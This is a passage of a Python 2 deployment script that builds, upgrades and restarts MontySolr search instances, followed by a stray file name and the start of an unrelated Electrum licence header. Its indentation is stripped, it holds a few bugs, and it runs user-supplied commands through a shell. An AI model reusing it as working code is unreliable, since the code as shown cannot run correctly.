code = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
else:
code = subprocess.call(cmd, shell=True)
except OSError:
error('failed: %s' % cmd)
else:
if strict and code != 0:
error('failed: %s' % cmd)
return code
def get_output(args):
return subprocess.check_output(SPACE.join(args), shell=True)
def check_basics():
if not os.path.exists(INSTDIR):
error('INSTDIR does not exist: %s' % INSTDIR )
if not os.access(INSTDIR, os.W_OK):
error('Cannot write into INSTDIR: %s' % INSTDIR)
def check_options(options):
if options.force_recompilation:
options.update = True
if options.test_scenario:
if not re.compile(r"^(\+|\-)?(major|minor|patch)$").match(options.test_scenario):
error("Wrong format in --test_scenario: " % options.test_scenario)
if options.test_scenario[0] == '+':
operator = lambda x: x+1
else:
operator = lambda x: x-1
if 'major' in options.test_scenario:
operation = lambda tag: tag.__setattr__('major', operator(tag.major))
elif 'minor' in options.test_scenario:
operation = lambda tag: tag.__setattr__('minor', operator(tag.minor))
elif 'patch' in options.test_scenario:
operation = lambda tag: tag.__setattr__('patch', operator(tag.patch))
else:
error("I'll never be executed :-) Or, will i?")
options.test_scenario = operation
def get_arg_parser():
usage = '%prog [options] tagname'
p = optparse.OptionParser(usage=usage)
p.add_option('-a', '--setup_prerequisites',
default=False, action='store_true',
help='Install all prerequisites')
p.add_option('-p', '--setup_python',
default=False, action='store_true',
help='Setup Python virtualenv')
p.add_option('--setup_ant',
default=False, action='store_true',
                 help='Install Ant (1.8.4) into perpetuum folder, this must be called with ANT_HOME=<perpetuum>/ant')
p.add_option('-d', '--check_diagnostics',
default=False, action='store_true',
help='Invokes /solr/montysolr_diagnostics when checking MontySolr health')
p.add_option('-u', '--update',
default=False, action='store_true',
help='Update live instances. You must supply their names as arguments')
p.add_option('-c', '--create',
default=False, action='store_true',
help='Create the live instance if it doesn\'t exist')
p.add_option('-x', '--start_indexing',
default=False, action='store_true',
help='Call invenio-doctor?command=discover for major/minor version upgrades')
p.add_option('-f', '--force_recompilation',
default=False,
action='store_true',
help='Force recompilation (even if no tag upgrade)',)
p.add_option('-t', '--timeout',
default=5*60, action='store',
help='Seconds after which live instance is declared dead',
type='float')
p.add_option('-o', '--stop',
default=False, action='store_true',
help='Stop running instances')
p.add_option('-s', '--start',
default=False, action='store_true',
help='Start instances')
p.add_option('-r', '--restart',
default=False, action='store_true',
help='Restart running instances')
p.add_option('-b', '--test_branch',
action='store',
help='Instead of a tag, checkout a branch (latest code) instead of a tag. Use only for testing!')
p.add_option('-S', '--test_scenario',
action='store',
default=None,
                 help='Change the existing installation tag - the script will think it needs to rebuild things. values: [+/-](major,minor,patch) Use only for testing!')
p.add_option('-B', '--run_command_before',
default='', action='store',
help='Invoke this command BEFORE run - use to restart/update instance')
p.add_option('-A', '--run_command_after',
default='', action='store',
help='Invoke this command AFTER run - use to restart/update instance')
p.add_option('--no-virtualenv',
default=False, action='store_true',dest="no_venv",
help="Don't run anything in a virtualenv")
return p
def manual_edit(fn):
run_cmd([os.environ["EDITOR"], fn])
@contextmanager
def changed_dir(new):
print('$ cd %s' % new)
old = os.getcwd()
os.chdir(new)
try:
yield
finally:
print('$ cd %s' % old)
os.chdir(old)
def make_dist(name):
try:
os.mkdir(name)
except OSError:
if os.path.isdir(name):
sys.stderr.write('WARNING: dist dir %s already exists\n' % name)
else:
error('%s/ is not a directory' % name)
else:
print('created dist directory %s' % name)
class Tag(object):
def __init__(self, tag_name):
parts = tag_name.split('/')
result = tag_cre.match(parts[-1])
if result is None:
error('tag %s is not valid' % tag_name)
data = list(result.groups())
if len(parts) == 3:
self.ref = tag_name
else:
self.ref = 'not-valid-ref:%s' % tag_name
if data[3] is None:
# A final release.
self.is_final = True
data[3] = "f"
else:
self.is_final = False
# For everything else, None means 0.
for i, thing in enumerate(data):
if thing is None:
data[i] = 0
self.solr_ver = int(data[0])
self.major = int(data[1])
self.minor = int(data[2])
self.patch = int(data[3])
def __str__(self):
return "%d.%d.%d.%d" % (self.solr_ver,
self.major, self.minor, self.patch)
def __cmp__(self, other):
for att in ['solr_ver', 'major', 'minor', 'patch']:
a = getattr(self, att)
b = getattr(other, att)
if a < b:
return -1
elif a > b:
return 1
else:
continue
return 0
def make_tag(tag):
# make sure we're on the correct branch
if tag.patch > 0:
if get_output(['hg', 'branch']).strip().decode() != tag.basic_version:
print('It doesn\'t look like you\'re on the correct branch.')
if input('Are you sure you want to tag?') != "y":
return
run_cmd(['hg', 'tag', tag.hgname])
def get_release_tag(path=os.path.join(INSTDIR, 'RELEASE')):
if os.path.exists(path):
fo = open(path, 'r')
tag = Tag(fo.read().strip())
fo.close()
else:
tag = Tag('v0.0.0.0')
return tag
def get_latest_git_release_tag(path=os.path.join(INSTDIR, 'montysolr')):
"""calls git to find the latest tagged commit using:
git for-each-ref refs/tags --sort=-taggerdate --format='%(refname)' --count=1
"""
with changed_dir(path):
tag = get_output(['git', 'for-each-ref', 'refs/tags', '--sort=-taggerdate', '--format=\'%(refname)\'', '--count=1'])
if tag is None or tag.strip() == '':
error("Git returned no tagged reference")
return Tag(tag.strip())
def check_live_instance(options, instance_names):
git_tag = get_release_tag(path='montysolr/RELEASE')
example_tag = get_release_tag(path='montysolr/build/contrib/examples/%s/RELEASE' % INSTNAME)
# pretend some change has happened (used for testing)
if options.test_scenario:
options.test_scenario(example_tag)
if example_tag != git_tag:
build_example(git_tag,options)
example_tag = get_release_tag(path='montysolr/build/contrib/examples/%s/RELEASE' % INSTNAME)
base_path = os.path.realpath('.') # git_tag.minor = 1; git_tag.text = '40.1.1.2'
writer_counter = 0
list_of_reader_instances = []
writer_instance_name = None
for instance_name in instance_names:
if instance_name[-2:] == '#r':
list_of_reader_instances.append(instance_name[0:-2])
elif instance_name[-2:] == '#w':
writer_counter +=1
writer_instance_name = instance_name
if writer_counter > 1:
error("This script does not know how to handle situation\n" + \
"when you have more than 1 writer, you should invoke\n" + \
"the script for each set of writer+readers")
if len(list_of_reader_instances) > 0 and writer_instance_name is None:
error("When you use #r, you must specify also a writer")
# make sure the writer is first in the list of processed instances
if writer_instance_name is not None:
instance_names.insert(0, instance_names.pop(instance_names.index(writer_instance_name)))
writer_instance_name = writer_instance_name[0:-2]
writer_finished = False
for instance_name in instance_names:
if '#' in instance_name:
instance_name, instance_mode = instance_name.split('#')
else:
instance_mode = ''
symbolic_name = instance_name # live-9001
symbolic_name_data = '%s_data' % instance_name # live-9001_data
real_name = '%s_%s' % (instance_name, str(git_tag)) #live-9001_40.1.0.1
# if we are a 'reader', we need to point at the index of a writer
if instance_mode == 'r':
real_name_data = '%s_%s_data' % (writer_instance_name, str(git_tag)) #live-9000_40.1.0.1_data
else:
real_name_data = '%s_%s_data' % (instance_name, str(git_tag)) #live-9001_40.1.0.1_data
next_release = 'next-release_%s' % (instance_name) # next-release_live-9001
next_release_data = 'next-release_%s_data' % (instance_name) #next-release_live-9001_data
port = extract_port(symbolic_name)
if not os.path.exists(symbolic_name):
# instance does not exist yet
# status: OK, unittest OK
if options.create:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['ln', '-s', real_name, symbolic_name])
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
else:
assert os.path.exists(real_name_data)
run_cmd(['ln', '-s', real_name_data, symbolic_name_data])
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/%s/solr/data" % (base_path, symbolic_name)])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
if options.start_indexing:
assert start_indexing(symbolic_name, port=port)
else:
print('WARNING - instance name does not exist, skipping: %s' % symbolic_name)
continue
else:
if not os.path.islink(symbolic_name):
                error('The live instance must be a symbolic link: %s -> %s' % (symbolic_name, real_name))
# some previous run has already created a candidate for the next run, this instance
# is indexing data, once it has finished, we can stop it and move upfront
if os.path.exists(next_release):
# status: OK, unittest OK
assert os.path.exists(next_release_data)
port = get_pid(os.path.join(next_release, 'port')) # it will fail if it doesn't exist
next_pid = get_pid(next_release + "/montysolr.pid")
if check_pid_is_running(next_pid)==False:
error("The next-release is present, but dead - we do not expect this!!!")
if instance_mode == 'r' and not writer_finished:
if os.path.exists('writer.finished'):
                        print 'It looks like the previous deployment crashed - restarting deployment...'
writer_finished = True
run_cmd(['rm', 'writer.finished'])
else:
continue
if instance_mode == 'r' or is_invenio_doctor_idle(port):
assert stop_live_instance(next_release, max_wait=options.timeout)
assert stop_live_instance(symbolic_name, max_wait=options.timeout)
orig_port = get_pid(os.path.join(symbolic_name, 'port'))
run_cmd(['rm', symbolic_name])
run_cmd(['rm', symbolic_name_data])
run_cmd(['ln', '-s', os.path.realpath(next_release), symbolic_name])
run_cmd(['ln', '-s', os.path.realpath(next_release_data), symbolic_name_data])
run_cmd(['rm', next_release])
run_cmd(['rm', next_release_data])
run_cmd(['touch', 'writer.finished'])
writer_finished=True
assert start_live_instance(options, symbolic_name, orig_port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
print ('%s still getting itself ready, nothing to do yet...' % next_release)
continue
live_tag = get_release_tag(path='%s/RELEASE' % symbolic_name)
if live_tag == git_tag:
# status: OK, unittest missing
if options.force_recompilation or options.test_scenario:
run_cmd(['cp', '-fr', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, symbolic_name])
# just check if the instance is in a healthy state
kwargs = dict(max_wait=6) # it should be already running, so do it quickly
if options.check_diagnostics:
kwargs['tmpl'] ='http://localhost:%s/solr/montysolr_diagnostics'
if not check_instance_health(port, **kwargs) or options.test_scenario or options.force_recompilation:
if stop_live_instance(symbolic_name, max_wait=options.timeout):
start_live_instance(options, symbolic_name, port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
error("Can't restart: %s" % symbolic_name)
else:
print ('%s is HEALTHY' % symbolic_name)
continue # nothing to do
if live_tag.major != git_tag.major or live_tag.solr_ver != git_tag.solr_ver:
# major upgrade, we start a new instance and indexing
# status: OK, unittest: OK
if os.path.exists(real_name) or os.path.exists(real_name_data):
if os.path.exists(os.path.join(real_name, 'montysolr.pid')):
pid = get_pid(os.path.join(real_name, 'montysolr.pid'))
if pid != -1 and check_pid_is_running(pid):
error("The live instance at %s is already running, we cannot create new-release with the same name" % real_name)
run_cmd(['rm', '-fr', real_name])
if instance_mode != 'r':
run_cmd(['rm', '-fr', real_name_data])
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
else:
assert os.path.exists(real_name_data)
run_cmd(['ln', '-s', real_name, next_release])
run_cmd(['ln', '-s', real_name_data, next_release_data])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
run_cmd(['ln', '-s', '%s/%s' % (base_path, real_name_data), "%s/%s/solr/data" % (base_path, next_release)])
temporary_port = port+NEW_INSTANCE_PORT_GAP
assert start_live_instance(options, next_release, port=temporary_port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
if options.start_indexing:
assert start_indexing(next_release, port=temporary_port)
elif live_tag.minor != git_tag.minor:
# minor upgrade, we can re-use the index (we create a copy and keep)
# the old index in place
# status: OK, unittest: OK
if options.test_scenario and os.path.exists(real_name):
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, real_name])
else:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
run_cmd(['cp', '-fR', '%s/*' % symbolic_name_data, real_name_data])
else:
assert os.path.exists(real_name_data)
stop_live_instance(symbolic_name, max_wait=options.timeout)
run_cmd(['rm', symbolic_name])
run_cmd(['rm', symbolic_name_data])
run_cmd(['ln', '-s', real_name, symbolic_name])
run_cmd(['ln', '-s', real_name_data, symbolic_name_data])
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/solr/data" % real_name])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
# just a patch, we will re-use index
# status: OK, unittest: OK
stop_live_instance(symbolic_name, max_wait=options.timeout)
if options.test_scenario and os.path.exists(real_name):
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, real_name])
else:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/solr/data" % real_name])
run_cmd(['rm', symbolic_name])
run_cmd(['ln', '-s', real_name, symbolic_name])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
def extract_port(symbolic_name):
digits = []
for l in reversed(symbolic_name):
if l.isdigit():
digits.insert(0, l)
else:
break
if len(digits) == 0:
error("The instance name must end with the port, eg. live-9002. We got: %s" % symbolic_name)
return int(''.join(digits))
def save_into_file(path, value):
assert isinstance(value, int)
fo = open(path, 'w')
fo.write(str(value))
fo.close()
def start_indexing(instance_dir, port):
url = 'http://localhost:%s/solr/invenio-doctor' % port
rsp = req(url, command='status')
if rsp['status'] == 'busy':
print ('WARNING: live instance is reporting to be already busy: %s' % instance_dir)
return
rsp = req(url, command='discover')
rsp = req(url, command='start')
time.sleep(3)
if is_invenio_doctor_idle(port):
error('something is wrong, indexing finished too fast %s' % instance_dir)
return True
def check_instance_health(port, max_wait=30, tmpl='http://localhost:%s/solr/admin/ping'):
url = tmpl % port
i = 0
max_time = time.time() + max_wait
rsp = None
while time.time() < max_time:
try:
rsp = req(url)
if rsp['status'] == '0' or rsp['status'] == 'OK':
return True
except Exception, e:
if rsp is None:
print "Waiting for instance to come up at %s: %d sec." % (url, max_time - time.time(),)
if i > 100:
traceback.print_exc(e)
if rsp is not None and 'error' in rsp:
error(str(rsp['error']).replace('\\n', "\n"))
time.sleep(1)
i += 1
return False
def is_invenio_doctor_idle(port):
url = 'http://localhost:%s/solr/invenio-doctor' % port
rsp = req(url, command='status')
if rsp['status'] == 'busy':
return False
elif rsp['status'] == 'idle':
return True
else:
        error('something is wrong, unexpected reply: %s' % rsp)
def reload_core(port):
url = 'http://localhost:%s/solr/admin/cores?action=RELOAD&core=collection1' % port
rsp = req(url, command='status')
if 'status' in rsp and rsp['status'] == '0':
return True
else:
error('something is wrong, unexpected reply: %s' % rsp)
def make_request(q, url, kwargs):
try:
kwargs['wt'] = 'json'
params = urllib.urlencode(kwargs)
page = ''
conn = urllib.urlopen(url, params)
page = conn.read()
rsp = json.loads(page)
conn.close()
q.put(rsp)
except Exception, e:
q.put(e)
def req(url, **kwargs):
q = Queue.Queue()
t = threading.Thread(target=make_request, args = (q, url, kwargs))
t.start()
t.join(3.0)
r = q.get()
if isinstance(r, Exception):
raise r
elif r is None:
raise Exception("Timeout getting url=%s & %s" % (url, kwargs))
return r
def get_pid(pidpath, raw=False):
if os.path.exists(pidpath):
with open(pidpath, 'r') as pidfile:
r_pid = pidfile.read().strip()
try:
if raw:
return r_pid
return int(r_pid)
except ValueError:
return -1
return -1
def acquire_lock(pidpath):
fo = open(pidpath, 'w')
fo.write(str(os.getpid()))
fo.close()
def remove_lock(pidpath):
os.remove(pidpath)
def check_pid_is_running(pid):
if os.path.exists('/proc/%s' % pid):
return True
return False
def check_prerequisites(options):
if options.setup_ant:
setup_ant(options)
if options.setup_prerequisites or options.setup_python:
setup_python(options)
check_ant(options)
if not os.path.exists('montysolr'):
run_cmd(['git', 'clone', GITURL, 'montysolr'])
with changed_dir('montysolr'):
run_cmd(['git', 'fetch', '--all'])
#run_cmd(['git', 'reset', '--hard', 'origin/master'])
#run_cmd(['git', 'checkout', 'master'])
def check_ant(options):
version = get_output(["ant -version"])
if ' version ' in version:
elements = version.split()
version = elements[elements.index('version')+1]
version = int(version.replace('.', '')[0:3])
if version < 182:
error("""
Your installation of ant is too old: %s
You can run: montysolrupdate.py --setup_ant
and set ANT_HOME=%s""" %
(version, os.path.join(INSTDIR, "perpetuum/ant")))
def setup_ant(options):
"""
On old systems, such as CentOS, the ant binaries are useless
"""
if options.force_recompilation and os.path.exists('ant'):
run_cmd(['rm', '-fr', 'ant'])
elif os.path.exists('ant/RELEASE') and str(get_pid('ant/RELEASE')) == str(UPDATER_RELEASE):
return # already installed
with open("install_ant.sh", "w") as build_ant:
build_ant.write("""#!/bin/bash -e
export JAVA_HOME=%(java_home)s
export ANT_HOME=%(ant_home)s
wget -nc http://archive.apache.org/dist/ant/binaries/apache-ant-1.8.4-bin.tar.gz
tar -xzf apache-ant-1.8.4-bin.tar.gz
mv apache-ant-1.8.4 ant
cd ant
export PATH=%(ant_home)s/bin:$PATH
ant -f fetch.xml -Ddest=system
echo "%(release)s" > RELEASE
""" % {'java_home': JAVA_HOME,
'ant_home': os.path.join(INSTDIR, "perpetuum/ant"),
'release': UPDATER_RELEASE})
run_cmd(['chmod', 'u+x', 'install_ant.sh'])
run_cmd(['./install_ant.sh'])
def setup_python(options):
if options.force_recompilation and os.path.exists('python'):
run_cmd(['rm', '-fr', 'python'])
elif os.path.exists('python/RELEASE') and str(get_pid('python/RELEASE')) == str(PYTHON_RELEASE):
return # python already installed
with open("install_python.sh", "w") as inpython:
header = '\n'.join([
'#!/bin/bash -e',
'echo "using python: %(python)s"',
'[ -d python ] || mkdir python',
'echo "0" > python/RELEASE',
'',
])
venv_activate = '\n'.join([
'virtualenv --unzip-setuptools -p %(python)s python',
'source python/bin/activate',
'echo "done creating python virtualenv"',
'',
])
modules = ' '.join([
'setuptools',
'sqlalchemy',
'mysql-python',
#'numpy',
#'lxml',
'simplejson',
'configobj',
'pyparsing==1.5.7',
'nameparser'
])
core_commands = '\n'.join([
'#easy_install -U distribute==0.6.30',
'',
'# install needed modules; numpy needs libatlas-base-dev',
'pip install --upgrade %s' % modules,
'',
'# verify installation',
'python -c "import numpy,lxml,simplejson,configobj,pyparsing, MySQLdb, sqlalchemy"',
'',
])
venv_deactivate = 'deactivate\n'
cleanup = '\n'.join([
'echo "%(release)s" > python/RELEASE',
'exit 0',
])
if options.no_venv:
venv_activate,venv_deactivate = '',''
inpython.write(
(header+venv_activate+core_commands+venv_deactivate+cleanup)
% {'python': sys.executable, 'release': PYTHON_RELEASE} )
run_cmd(['chmod', 'u+x', 'install_python.sh'])
run_cmd(['./install_python.sh'])
def setup_build_properties(options):
lines = []
with open('build.properties.default', 'r') as infile:
for line in infile:
line = line.strip()
if len(line) > 0 and line[0] != '#':
parts = line.split('=', 1)
if parts[0] == 'python':
if options.no_venv:
lines.append('python=python')
else:
lines.append('python=%s' % os.path.realpath(os.path.join(INSTDIR, "perpetuum", "python/bin/python")))
elif parts[0] == 'jcc':
lines.append('jcc=%s' % {5:'-m jcc',6:'-m jcc.__main__',7:'-m jcc'}[sys.version_info[1]])
elif parts[0] == 'ant':
lines.append('ant=%s' % 'ant')
else:
lines.append(line)
fo = open('build.properties', 'w')
fo.write("\n".join(lines))
fo.close()
def upgrade_montysolr(curr_tag, git_tag,options):
with changed_dir('montysolr'):
with open('build-montysolr.sh', 'w') as build_script:
header = '#!/bin/bash -e\n'
venv_activate = 'source ../python/bin/activate\n'
venv_deactivate = 'deactivate\n'
core_commands = '\n'.join([
'export JAVA_HOME=%(java_home)s',
'export ANT_HOME=%(ant_home)s',
'',
'case "$1" in',
'"nuke")',
' if [ -f RELEASE ]; then',
' rm RELEASE',
' fi',
' ant clean',
' ant get-solr build-all',
' ;;',
'"minor" | "3")',
' if [ -f RELEASE ]; then',
' rm RELEASE',
' fi',
' ant get-solr build-all',
' ;;',
'esac',
'',
'ant build-contrib',
'ant -file contrib/examples/build.xml clean build-one -Dename=%(example)s',
''
])
if options.no_venv:
venv_activate,venv_deactivate='',''
build_script.write(
(header+venv_activate+core_commands+venv_deactivate)
% {'example': INSTNAME, 'java_home': JAVA_HOME, 'ant_home': ANT_HOME}
)
run_cmd(['chmod', 'u+x', 'build-montysolr.sh'])
#if os.path.exists('RELEASE'):
# run_cmd(['rm', 'RELEASE'], strict=False)
# get the target tag
# run_cmd(['git', 'checkout', '-f', '-b', git_tag.ref], strict=False)
run_cmd(['git', 'fetch', '--all'])
run_cmd(['git', 'stash'])
run_cmd(['git', 'reset', '--hard', '/' in git_tag.ref and git_tag.ref or ('origin/' + git_tag.ref)])
setup_build_properties(options)
# nuke everything, start from scratch
if curr_tag.solr_ver != git_tag.solr_ver or curr_tag.major != git_tag.major:
#run_cmd(['ant', 'clean'])
#run_cmd(['ant', 'get-solr', 'build-solr'])
# maybe i could make this to work, right now: upgrades must be invoked after source was called
#run_cmd(['bash', '-c', 'source %s/python/bin/activate; ant get-solr build-solr; deactivate' % os.path.realpath('..')])
#run_cmd(['ant', 'build-all'])
run_cmd(['./build-montysolr.sh', 'nuke'])
elif curr_tag.minor != git_tag.minor:
#run_cmd(['ant', 'get-solr', 'build-solr'])
#run_cmd(['ant', 'build-all'])
run_cmd(['./build-montysolr.sh', 'minor'])
else:
run_cmd(['./build-montysolr.sh', 'patch'])
# always re-compile, this is not too expensive
#run_cmd(['ant', 'build-contrib'])
# assemble the deployment target
#run_cmd(['ant', '-file', 'contrib/examples/build.xml', 'clean', 'build-one', '-Dename=%s' % INSTNAME])
#run_cmd(['ant', '-file', 'contrib/examples/build.xml', 'run-configured', '-Dename=%s' % INSTNAME,
# '-Dtarget=generate-run.sh', '-Dprofile=silent.profile'])
# update the RELEASE file
with open('RELEASE', 'w') as release:
release.write(str(git_tag))
def build_example(git_tag,options):
with changed_dir('montysolr'):
with open('build-example.sh', 'w') as build_script:
header = '#!/bin/bash -e\n'
venv_activate = 'source ../python/bin/activate\n'
venv_deactivate = 'deactivate\n'
core_commands = '\n'.join([
                'example=${1:-%(example)s}',
                'profile_names=${2:-silent}',
'export JAVA_HOME=%(java_home)s',
'export ANT_HOME=%(ant_home)s',
'',
'ant -file contrib/examples/build.xml clean build-one -Dename=$example',
'',
'# generate run.sh for every profile',
'for profile_name in $profile_names',
'do',
' ant -file contrib/examples/build.xml run-configured -Dename=$example -Dtarget=generate-run.sh -Dprofile=${profile_name}.profile',
' mv build/contrib/examples/${example}/run.sh build/contrib/examples/${example}/${profile_name}.run.sh',
'done',
'',
])
if options.no_venv:
venv_activate,venv_deactivate='',''
build_script.write(
(header+venv_activate+core_commands+venv_deactivate)
% {'example': INSTNAME, 'java_home': JAVA_HOME, 'ant_home': ANT_HOME}
)
run_cmd(['chmod', 'u+x', './build-example.sh'])
profiles = map(lambda x: x.replace('.profile',''), filter(lambda x: '.profile' in x, os.listdir('build/contrib/examples/%s' % INSTNAME)))
run_cmd(['./build-example.sh', INSTNAME, '"%s"' % " ".join(profiles)])
with open('build/contrib/examples/%s/RELEASE' % INSTNAME, 'w') as release:
release.write(str(git_tag))
def stop_live_instance(instance_dir, max_wait=30):
with changed_dir(instance_dir):
pid = get_pid('montysolr.pid')
if check_pid_is_running(pid) == False:
print('Warning: wanted to stop live instance which is not running: %s' % instance_dir)
return True
port = None
if os.path.exists('port'):
fo = open('port', 'r')
port = fo.read().strip()
fo.close()
wait_no_more = time.time() + max_wait/2
while time.time() < wait_no_more:
if check_pid_is_running(pid):
run_cmd(['kill', pid])
time.sleep(1)
else:
continue
if check_pid_is_running(pid):
wait_no_more = time.time() + max_wait/2
while time.time() < wait_no_more:
if check_pid_is_running(pid):
run_cmd(['kill', '-9', pid])
time.sleep(1)
else:
continue
if check_pid_is_running(pid):
error("We cannot stop %s pid=%s" % (instance_dir, pid))
return True
def start_live_instance(options, instance_dir, port,
max_attempts = 3,
max_wait=30,
instance_mode='',
list_of_readers=[]):
with changed_dir(instance_dir):
if options.run_command_before:
run_cmd([options.run_command_before])
pid = get_pid('montysolr.pid')
if pid != -1 and check_pid_is_running(pid):
error("The live instance at %s is still running" % instance_dir)
fo = open('port', 'w')
fo.write(str(port))
fo.close()
# I am seeing that the socket is not closed in time
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#try:
# s.bind(('', port)) # will fail if the socket is already used
#finally:
# s.close()
failed = get_pid('FAILED.counter')
if failed > max_attempts:
error("The live instance is a zombie (probably compilation failed), call a doctor!")
profile_name = 'normal'
if instance_mode == 'w':
profile_name = 'writer'
elif instance_mode == 'r':
profile_name = 'reader'
else:
profile_name = 'normal'
if not os.path.exists('%s.run.sh' % profile_name):
error("Missing %s.run.sh - (you must have a %s.profile to generate this file)" %
(profile_name, profile_name))
fi = open('%s.run.sh' % profile_name, 'r')
start = fi.read()
fi.close()
venv_activate = '' if options.no_venv else 'source ../python/bin/activate'
lines = start.split("\n")
lines.insert(1, """
# File modified by: montysolrupdate.py
# Base profile: %(profile)s.run.sh
%(venv_activate)s
export PYTHONPATH=`python -c "import sys;print(':'.join(sys.path))"`:$PYTHONPATH
""" % {'profile': profile_name, 'venv_activate':venv_activate}
)
start = '\n'.join(lines)
start = re.sub(r'HOMEDIR=.*\n', 'HOMEDIR=%s\n' % os.path.realpath('.'), start)
start = re.sub(r'-Djetty.port\=\d+', '-Djetty.port=%s' % port, start)
start = re.sub('\n([\t\s]+)(java -cp )', '\\1export PATH=%s/bin:$PATH\n\\1\\2' % JAVA_HOME, start)
# this is necessary only when in test run (and there we can be sure that the files were
# overwritten when a new code was installed)
if options.test_scenario or not os.path.exists('solr/collection1/conf/solrconfig.xml.orig'):
run_cmd(['cp', 'solr/collection1/conf/solrconfig.xml', 'solr/collection1/conf/solrconfig.xml.orig'])
solrconfig = open('solr/collection1/conf/solrconfig.xml.orig', 'r').read()
if instance_mode == 'w' and len(list_of_readers): # for master-writers
# we must change also the solrconfig
list_of_nodes = []
for n in list_of_readers:
reader_port = extract_port(n.split('#')[0])
list_of_nodes.append(' <str>http://localhost:%s/solr/ads-config?command=reopenSearcher</str>' % reader_port)
solrconfig = solrconfig.replace('</updateHandler>',
"""
<!-- automatically generated by montysolr-update.py -->
<listener event="postCommit"
class="solr.RunExecutableListener">
<str name="exe">curl</str>
<str name="dir">.</str>
<bool name="wait">false</bool>
<arr name="args"> %s </arr>
</listener>
</updateHandler>
""" % ' '.join(list_of_nodes))
with open('solr/collection1/conf/solrconfig.xml.new', 'w') as fi_solrconfig:
fi_solrconfig.write(solrconfig)
with open('solr/collection1/conf/solrconfig.xml', 'w') as fi_solrconfig:
fi_solrconfig.write(solrconfig)
fo = open('automatic-run.sh', 'w')
fo.write(start)
fo.close()
run_cmd(['chmod', 'u+x', 'automatic-run.sh'])
run_cmd(['bash', '-e', './automatic-run.sh', '"%s"' % START_JVMARGS, '"%s"' % START_ARGS, '&'], False)
fo = open('manual-run.sh', 'w')
fo.write('bash -e ./automatic-run.sh "%s" "%s" &' % (START_JVMARGS, START_ARGS))
fo.close()
kwargs = dict(max_wait=options.timeout)
if options.check_diagnostics:
kwargs['tmpl'] ='http://localhost:%s/solr/montysolr_diagnostics'
if not check_instance_health(port, **kwargs):
run_cmd(['kill', '-9', str(get_pid('montysolr.pid'))])
time.sleep(3)
failed += 1
save_into_file('FAILED.counter', failed)
error("Instance is not in a healthy state %s" % instance_dir)
return False
if os.path.exists('FAILED.counter'):
run_cmd(['rm', 'FAILED.counter'])
if options.run_command_after:
run_cmd([options.run_command_after])
return True
def main(argv):
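# Overall flow: acquire the update lock, parse and validate options, install
# prerequisites if requested, compare the local RELEASE tag against the latest
# git release tag, rebuild/upgrade when they differ, then stop/start/check the
# requested live instances and release the lock.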
check_basics()
if not os.path.exists(os.path.join(INSTDIR, 'perpetuum')):
run_cmd(['mkdir', os.path.join(INSTDIR, 'perpetuum')])
with changed_dir(os.path.join(INSTDIR, 'perpetuum')):
update_pid = get_pid('update.pid')
if update_pid != -1 and check_pid_is_running(update_pid):
error("The script is already running with pid: %s" % update_pid)
acquire_lock('update.pid')
parser = get_arg_parser()
options, args = parser.parse_args(argv)
check_options(options)
print "============="
for k,v in options.__dict__.items():
print '%s=%s' % (k, v)
print 'args=', args
print "============="
# install pre-requisities if requested
check_prerequisites(options)
instance_names = []
if len(args) > 1:
instance_names = args[1:]
else:
print('WARNING: no live instance name(s) supplied')
if options.update:
if options.force_recompilation:
run_cmd(['rm', 'montysolr/RELEASE'], strict=False)
# check the repo and find out if there are changes
git_tag = get_latest_git_release_tag('montysolr')
curr_tag = get_release_tag('montysolr/RELEASE')
# for testing, we may want to use the latest code
if options.test_branch:
git_tag.ref = options.test_branch
# pretend some change has happened (used for testing)
if options.test_scenario:
options.test_scenario(curr_tag)
if curr_tag > git_tag:
error("whaaat!?! The current instance has a higher tag than montysolr.git!? %s > %s" % (curr_tag, git_tag))
if curr_tag == git_tag:
if len(instance_names) > 0:
print("Compiled version is the latest, we'll just check the live instance(s)")
else:
upgrade_montysolr(curr_tag, git_tag, options)
if len(instance_names) > 0:
if options.stop or options.restart:
for iname in instance_names:
parts = iname.split('#')
stop_live_instance(instance_dir=parts[0], max_wait=60) # when killing, we can be nasty
if options.update or options.start or options.restart:
check_live_instance(options, instance_names)
remove_lock('update.pid')
if __name__ == '__main__':
main(sys.argv)
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
